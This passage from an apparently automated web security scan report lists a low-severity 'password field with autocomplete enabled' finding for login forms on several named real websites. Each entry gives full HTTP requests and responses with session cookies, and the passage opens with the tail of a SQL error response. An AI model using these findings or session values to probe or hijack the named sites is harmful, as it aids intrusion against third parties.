Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 19:13:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: no_mobile=1; expires=Fri, 25-Mar-2011 19:18:16 GMT
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=n2ng3g2453hjfkm1mhm60hmid3; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 25 Mar 2011 19:13:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>Unknown column 'NSFTW' in 'where clause'</font>]</font></blockquote><blockquote><font face=arial size=2 colo
...[SNIP]...
16. Password field with autocomplete enabled  previous  next
There are 19 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

16.1. http://forums.smartertools.com/login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://forums.smartertools.com
Path:   /login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.aspx?ReturnUrl=%2fmembers%2fChromebuster.aspx HTTP/1.1
Host: forums.smartertools.com
Proxy-Connection: keep-alive
Referer: http://forums.smartertools.com/cssearch/SearchResults.aspx?u=137549&o=DateDescending
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=85202318.1300554584.2.2.utmcsr=help.smartertools.com|utmccn=(referral)|utmcmd=referral|utmcct=/SmarterMail/v8/Topics/Default.aspx; __utma=134836083.1670938407.1300551915.1300551915.1300554519.2; CommunityServer-LastVisitUpdated-2570=; __utma=85202318.1655160661.1300151775.1300736103.1301157836.5; __utmc=85202318; __utmb=85202318.6.10.1301157836; CSAnonymous=144f9286-e92e-4b17-84c2-481ab0762dbb; CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:45:42 GMT

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.1.31113.47
Set-Cookie: CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:45:44 GMT; expires=Sun, 25-Mar-2012 16:45:44 GMT; path=/
Set-Cookie: CSAnonymous=144f9286-e92e-4b17-84c2-481ab0762dbb; expires=Sat, 26-Mar-2011 17:05:44 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:45:43 GMT
Content-Length: 11877


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<body>
       <form name="aspnetForm" method="post" action="/login.aspx?ReturnUrl=%2fmembers%2fChromebuster.aspx" id="aspnetForm">
<div>
...[SNIP]...
<td class="CommonFormField">
                    <input name="ctl00$bcr$ctl00$ctl03$password" type="password" maxlength="64" size="11" id="ctl00_bcr_ctl00_ctl03_password" class="CommonTextBig" onkeydown="return KeyDownHandlerctl00_bcr_ctl00_ctl03_loginButton(event);" />
                    <span class="txt4">
...[SNIP]...
16.2. http://forums.smartertools.com/login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://forums.smartertools.com
Path:   /login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.aspx?ReturnUrl=%2fAddPost.aspx%3fReplyToPostID%3d94084%26Quote%3dFalse HTTP/1.1
Host: forums.smartertools.com
Proxy-Connection: keep-alive
Referer: http://forums.smartertools.com/t/33244.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=85202318.1300554584.2.2.utmcsr=help.smartertools.com|utmccn=(referral)|utmcmd=referral|utmcct=/SmarterMail/v8/Topics/Default.aspx; __utma=134836083.1670938407.1300551915.1300551915.1300554519.2; CommunityServer-LastVisitUpdated-2570=; __utma=85202318.1655160661.1300151775.1300736103.1301157836.5; __utmc=85202318; __utmb=85202318.5.10.1301157836; CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:45:07 GMT; CSAnonymous=144f9286-e92e-4b17-84c2-481ab0762dbb

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.1.31113.47
Set-Cookie: CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:45:08 GMT; expires=Sun, 25-Mar-2012 16:45:08 GMT; path=/
Set-Cookie: CSAnonymous=144f9286-e92e-4b17-84c2-481ab0762dbb; expires=Sat, 26-Mar-2011 17:05:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:45:08 GMT
Content-Length: 11933


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<body>
       <form name="aspnetForm" method="post" action="/login.aspx?ReturnUrl=%2fAddPost.aspx%3fReplyToPostID%3d94084%26Quote%3dFalse" id="aspnetForm">
<div>
...[SNIP]...
<td class="CommonFormField">
                    <input name="ctl00$bcr$ctl00$ctl03$password" type="password" maxlength="64" size="11" id="ctl00_bcr_ctl00_ctl03_password" class="CommonTextBig" onkeydown="return KeyDownHandlerctl00_bcr_ctl00_ctl03_loginButton(event);" />
                    <span class="txt4">
...[SNIP]...
16.3. http://www.fast-report.com/en/buy/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /en/buy/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en/buy/ HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=76cc7f5b0df4ee756aa4259ff29089dc; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A18

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 11:41:20 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.3.3
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2F; expires=Tue, 05-Apr-2011 11:41:20 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 11:41:21 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A21; expires=Tue, 20-Mar-2012 11:41:21 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 18472

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&
...[SNIP]...
<td valign="top">

<form method="post" target="_top" action="/en/buy/index.php?login=yes"><input type="hidden" name="AUTH_FORM" value="Y">
...[SNIP]...
<input type="text" name="USER_LOGIN" value="" class="input-small">&nbsp;&nbsp;<input type="password" name="USER_PASSWORD" class="input-small">&nbsp;&nbsp;</td>
...[SNIP]...
16.4. http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /en/buy/order-FASTREPORT.NET.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en/buy/order-FASTREPORT.NET.html HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/buy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2F; PHPSESSID=76cc7f5b0df4ee756aa4259ff29089dc; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A19

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 11:41:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2Fbuy%2F; expires=Tue, 05-Apr-2011 11:41:29 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 11:41:31 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A31; expires=Tue, 20-Mar-2012 11:41:31 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 29289

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&
...[SNIP]...
<td valign="top">

<form method="post" target="_top" action="/en/auth.php?en%2Fbuy%2Forder-FASTREPORT_NET_html=&login=yes"><input type='hidden' name='backurl' value='/en/buy/order-FASTREPORT.NET.html'>
...[SNIP]...
<input type="text" name="USER_LOGIN" value="" class="input-small">&nbsp;&nbsp;<input type="password" name="USER_PASSWORD" class="input-small">&nbsp;&nbsp;</td>
...[SNIP]...
16.5. http://www.fast-report.com/en/download/fastreport.net-download.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /en/download/fastreport.net-download.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en/download/fastreport.net-download.html HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A20

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:30:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:30:30 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A30; expires=Tue, 20-Mar-2012 16:30:30 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 20098

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&
...[SNIP]...
<td valign="top">

<form method="post" target="_top" action="/en/auth.php?en%2Fdownload%2Ffastreport_net-download_html=&login=yes"><input type='hidden' name='backurl' value='/en/download/fastreport.net-download.html'>
...[SNIP]...
<input type="text" name="USER_LOGIN" value="" class="input-small">&nbsp;&nbsp;<input type="password" name="USER_PASSWORD" class="input-small">&nbsp;&nbsp;</td>
...[SNIP]...
16.6. http://www.fast-report.com/en/download/fastreport.net-download.html/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /en/download/fastreport.net-download.html/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en/download/fastreport.net-download.html/? HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/products/FastReport.Net.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A31

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:30:40 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2Fproducts%2FFastReport.Net.html; expires=Tue, 05-Apr-2011 16:30:40 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:30:42 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A42; expires=Tue, 20-Mar-2012 16:30:42 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 20062

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&
...[SNIP]...
<td valign="top">

<form method="post" target="_top" action="/en/auth.php?login=yes"><input type='hidden' name='backurl' value='/en/download/fastreport.net-download.html/index.php'>
...[SNIP]...
<input type="text" name="USER_LOGIN" value="" class="input-small">&nbsp;&nbsp;<input type="password" name="USER_PASSWORD" class="input-small">&nbsp;&nbsp;</td>
...[SNIP]...
16.7. http://www.fast-report.com/en/products/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /en/products/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en/products/ HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=76cc7f5b0df4ee756aa4259ff29089dc; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A28

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 11:41:31 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.3.3
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2Fbuy%2Forder-FASTREPORT.NET.html; expires=Tue, 05-Apr-2011 11:41:31 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 11:41:34 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A34; expires=Tue, 20-Mar-2012 11:41:34 GMT; path=/
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2Fbuy%2Forder-FASTREPORT.NET.html; expires=Tue, 05-Apr-2011 11:41:34 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 26652

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&
...[SNIP]...
<td valign="top">

<form method="post" target="_top" action="/en/products/index.php?login=yes"><input type="hidden" name="AUTH_FORM" value="Y">
...[SNIP]...
<input type="text" name="USER_LOGIN" value="" class="input-small">&nbsp;&nbsp;<input type="password" name="USER_PASSWORD" class="input-small">&nbsp;&nbsp;</td>
...[SNIP]...
16.8. http://www.fast-report.com/en/products/FastReport.Net.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /en/products/FastReport.Net.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en/products/FastReport.Net.html HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2F; PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A20

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:30:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:30:29 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A29; expires=Tue, 20-Mar-2012 16:30:29 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 19540

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&
...[SNIP]...
<td valign="top">

<form method="post" target="_top" action="/en/auth.php?en%2Fproducts%2FFastReport_Net_html=&login=yes"><input type='hidden' name='backurl' value='/en/products/FastReport.Net.html'>
...[SNIP]...
<input type="text" name="USER_LOGIN" value="" class="input-small">&nbsp;&nbsp;<input type="password" name="USER_PASSWORD" class="input-small">&nbsp;&nbsp;</td>
...[SNIP]...
16.9. https://www.godaddy.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /?isc=GPASH002 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
Set-Cookie: HPBackground=DanicaImageTwo; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:21 GMT
Content-Length: 250092


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=GPASH002&ci=9106&spkey=GDSWNET-M1PWCORPWEB123" onsubmit="return pcj_login_action(this);">
<div class="login sprt2">
...[SNIP]...
</div>
<input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" />
</div>
...[SNIP]...
16.10. https://www.godaddy.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /?isc=GPASH004 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; HPBackground=DanicaImageOne; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME; GoogleADServicesgoogleadwordssearch=cjiapcjcgapjuircrfujthnakaycbjcd; BlueLithium_domainsearch=cjiapcjcgapjuircrfujthnakaycbjcd; traffic=server=M1PWCORPWEB123&sitename=www%2Egodaddy%2Ecom&referringdomain=&referringpath=&shopper=42533607&querystring=isc%3DGPASH006%26se%3D%252B%26ci%3D415&isc=GPASH006&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1&split=68; serverVersion=A; domainYardVal=%2D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH004%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH004&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:39 GMT
Content-Length: 250091


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=GPASH004&ci=9106&spkey=GDSWNET-M1PWCORPWEB123" onsubmit="return pcj_login_action(this);">
<div class="login sprt2">
...[SNIP]...
</div>
<input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" />
</div>
...[SNIP]...
16.11. https://www.godaddy.com/Hosting/web-hosting.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /Hosting/web-hosting.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

